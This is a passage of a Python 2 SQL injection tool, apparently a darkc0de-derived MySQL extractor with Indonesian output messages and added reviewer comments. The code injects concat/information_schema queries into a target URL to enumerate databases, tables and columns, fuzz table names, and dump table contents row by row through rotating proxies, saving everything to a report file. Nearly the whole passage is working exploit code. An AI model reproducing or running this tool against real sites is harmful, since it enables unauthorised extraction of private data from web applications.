count_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
count_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex")+arg_end
arg_row = "Columns"
elif mode == "--dump":
print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
print "[+] and Column(s) "+str(arg_columns)
file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
file.write("\n[+] Column(s) "+str(arg_columns))
for column in arg_columns:
cendol += column+",0x1e,"
count_URL = site.replace("cendol","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table+arg_end
line_URL = site.replace("cendol",cendol+"0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table
if int(version) == 4:
count_URL = site.replace("cendol","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+arg_table+arg_end
line_URL = site.replace("cendol",cendol+"0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+arg_table
elif mode == "--masuk":
print "[+] Mulai masuk ke dalam database situs"
line_URL = site.replace("cendol","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns+"+arg_eva+"WHERE"+arg_eva+"table_schema!=0x"+"information_schema".encode("hex")
elif mode == "--dbs":
print "[+] Showing all databases current user has access too!"
file.write("\n[+] Showing all databases current user has access too!")
count_URL = site.replace("cendol","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex")+arg_end
line_URL = site.replace("cendol","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex")
arg_row = "Databases"
line_URL += arg_eva+"LIMIT"+arg_eva+"NUM,1"+arg_end
#Uncomment the lines below to debug issues with the line_URL or count_URL
#print "URL for Counting rows in column:",count_URL
#print "URL for exploit:",line_URL
#Fuzz table dan kolom untuk versi 4
if mode == "--fuzz":
print "[+] Nama tabel yg di cari :",len(fuzz_tables)
file.write("\n[+] Nama tabel yg di cari : "+str(len(fuzz_tables)))
print "[+] Nama kolom yg di cari :",len(fuzz_columns)
file.write("\n[+] Nama kolom yg di cari : "+str(len(fuzz_columns)))
print "[+] Sedang mencari tabel dan kolom "
file.write("\n[+] Sedang mencari tabel dan kolom")
fuzz_URL = site.replace("cendol","0x"+"cendol".encode("hex"))+arg_eva+"FROM"+arg_eva+"TABLE"+arg_end
for table in fuzz_tables:
try:
proxy_num+=1
table_URL = fuzz_URL.replace("TABLE",table)
gets+=1
#print "[!] Table Debug:",table_URL
source = proxy_list[proxy_num % proxy_len].open(table_URL).read()
e = re.findall("cendol", source)
if len(e) > 0:
print "\n[!] Found a table called:",table
file.write("\n\n[+] Found a table called: "+str(table))
print "\n[+] Now searching for columns inside table \""+table+"\""
file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
for column in fuzz_columns:
try:
proxy_num+=1
gets+=1
#print "[!] Column Debug:",table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")
source = proxy_list[proxy_num % proxy_len].open(table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")).read()
e = re.findall("cendol",source)
if len(e) > 0:
print "[!] Found a column called:",column
file.write("\n[!] Found a column called:"+column)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
print "[-] Done searching inside table \""+table+"\" for columns!"
file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
#Count rows/columns: one request with count_URL (built in the mode
# branches above); the injected COUNT(*) is read back from between the
# 0x1E record-separator bytes the query wraps around it.
if mode == "--schema" or mode == "--dump" or mode == "--dbs":
source = proxy_list[proxy_num % proxy_len].open(count_URL).read()
# Two 0x1E bytes followed by non-space text mark the injected field.
match = re.findall("\x1e\x1e\S+",source)
# NOTE: match[0] raises IndexError when the marker is absent from the
# response; this statement is not inside any try block.
match = match[0][2:].split("\x1e")
row_value = match[0]
print "[+] Number of "+arg_row+": "+row_value
file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")
# NOTE(review): indentation was lost in this paste, so it is not visible
# whether the `if` on the next line has a body of its own or whether the
# loop below is nested inside it; it is documented here as one unit.
if mode == "--schema" or mode == "--masuk" or mode == "--dbs":
##Final extraction loop for --schema / --dump / --dbs
if mode == "--schema" or mode == "--dump" or mode == "--dbs":
# Request one row per iteration by substituting NUM in line_URL, until
# table_num passes row_value (the count obtained above).  table_num,
# num, cur_db and cur_table are initialised outside this span.
while int(table_num) != int(row_value)+1:
#print "table#:",table_num,"row#:",row_value
try:
proxy_num+=1
gets+=1
#print line_URL
source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read()
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
# --schema: fields are db, table, column; print a header whenever the
# database or table changes, otherwise append the column to the line.
if mode == "--schema" or mode == "--masuk":
match = match[0][2:].split("\x1e")
if cur_db != match[0]:
cur_db = match[0]
file.write("\n[Database]: "+match[0]+"\n")
print "[Database]: "+match[0]
print "[Table: Columns]"
file.write("[Table: Columns]")
if cur_table != match[1]:
print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
cur_table = match[1]
table_num = int(table_num) + 1
else:
sys.stdout.write(",%s" % (match[2]))
file.write(","+match[2])
sys.stdout.flush()
#Gathering Databases only: one name per row
elif mode == "--dbs":
match = match[0]
file.write("\n["+str(num)+"]"+str(match))
print "["+str(num)+"]",match
table_num = int(table_num) + 1
#Collect data from tables & columns: a wider pattern captures the whole
# record between the double 0x1E markers, then splits it on single 0x1E.
elif mode == "--dump":
match = re.findall("\x1e\x1e+[\w\d\?\/\_\:\.\=\s\S\-+]+\x1e\x1e",source)
match = match[0].strip("\x1e").split("\x1e")
if arg_verbose == 1:
print "\n["+str(num)+"] ",
file.write("\n["+str(num)+"] ",)
else:
file.write("\n")
for ddata in match:
if ddata == "":
ddata = "NoDataInColumn"
sys.stdout.write("%s:" % (ddata))
file.write("%s:" % ddata)
sys.stdout.flush()
table_num = int(table_num) + 1
# No marker in the response: --dump records an empty row and continues,
# the other modes stop the loop.
else:
if mode == "--dump":
sys.stdout.write("\n[%s] No data" % (num))
# NOTE: ddata is only bound once a previous row was dumped.
file.write("%s:" % ddata)
table_num = int(table_num) + 1
else:
break
num = int(num) + 1
except (KeyboardInterrupt, SystemExit):
raise
# Bare except: a failed request (or the NameError noted above) is
# swallowed and the loop retries the same num/table_num.
except:
pass
#List database contents (--masuk): same db/table/column grouping as
# --schema, but without a preceding count; the loop is unbounded and only
# ends when a response carries no marker.
if mode == "--masuk":
while 1:
try:
proxy_num+=1
gets+=1
source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read()
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
match = match[0][2:].split("\x1e")
# New database: print a header and restart the table counter.
if cur_db != match[0]:
cur_db = match[0]
file.write("\n\n[Database]: "+match[0]+"\n")
print "\n\n[Database]: "+match[0]
print "[Table: Columns]"
file.write("[Table: Columns]")
table_num=0
if cur_table != match[1]:
print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
cur_table = match[1]
table_num = int(table_num) + 1
else:
sys.stdout.write(",%s" % (match[2]))
file.write(","+match[2])
sys.stdout.flush()
else:
# First request already empty -> nothing readable at all.
if num == 0:
print "\n[-] No Data Found"
break
num = int(num) + 1
except (KeyboardInterrupt, SystemExit):
raise
# Bare except: a failed request is swallowed and the same num is retried
# indefinitely, since num is only advanced on the success path.
except:
pass
#Wrap-up once extraction is finished: timestamp and request count go to
# both stdout and the report file, then the file is closed.
# (--dbs and --fuzz are not covered by this condition, so for them the
# file is left open until interpreter exit.)
if mode == "--schema" or mode == "--masuk" or mode == "--dump":
print ""
print "\n[-] %s" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] [%s]" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] selesai\n"
file.write("\n[-] selesai\n")
# dbt is presumably the report file name chosen outside this span - confirm.
print "Untuk melihat hasilnya buka folder python dan lihat ada bacaan", dbt,"\n"
file.close()